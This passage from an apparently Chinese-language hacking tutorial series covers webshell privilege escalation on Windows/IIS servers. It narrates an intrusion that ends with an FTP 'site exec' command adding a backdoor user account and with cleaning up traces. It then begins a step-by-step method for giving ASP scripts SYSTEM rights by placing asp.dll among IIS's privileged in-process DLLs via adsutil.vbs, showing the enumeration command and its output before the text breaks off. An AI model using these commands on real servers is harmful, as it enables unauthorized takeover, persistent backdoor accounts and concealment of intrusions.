超全的webshell权限提升方法(13)

好了，到这里，我们直接ftp上去吧，ls一下，哈哈，系统盘在我的掌握下。我们能不能运行系统命令呢？是可以的，这样就可以： 
ftp>quote site exec net user xr rain /add 
在webshell上运行net user，就可以看见添加成功了。 
整个入侵渗透到这就结束了，在一阵后清理打扫后。我们就开始讨论了。其实，突破防火墙有很多好的rootkit可以做到的，但是我们觉得系统自带的服务才是最安全的后门。 
-------------------------------------------------------------------------------- 
-- 
-- 
asp.dll解析成system提升权限 
网络上传统的提升asp权限为系统的有两种: 
1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system. 
但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天 
我要谈的关于adsutil.vbs提升权限. 
2.用adsutil.vbs搞定. 
在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法: 
先举个例子: 
有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜. 
转到计算机上: 
在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只 
普通的狗,他的权限少得可怜. 
那么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是 
把asp.dll加入特权的dll一族之中.提升步骤为: 
<1>先查看有特权一话有哪些. 
<2>加asp.dll加入特权一族 
好了,下面我们就来实践这个过程. 
1)查看有特权的dll文件: 
命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 
得到显示为: 
C:\\Inetpub\\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows 
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved. 
InProcessIsapiApps : (LIST) (5 Items) 
"C:\\WINNT\\system32\\idq.dll" 
"C:\\WINNT\\system32\\inetsrv\\httpext.dll" 
"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" 
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll" 
"C:\\WINNT\\system32\\msw3prt.dll" 
看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
这几个文件,不同的机子,可能会不同.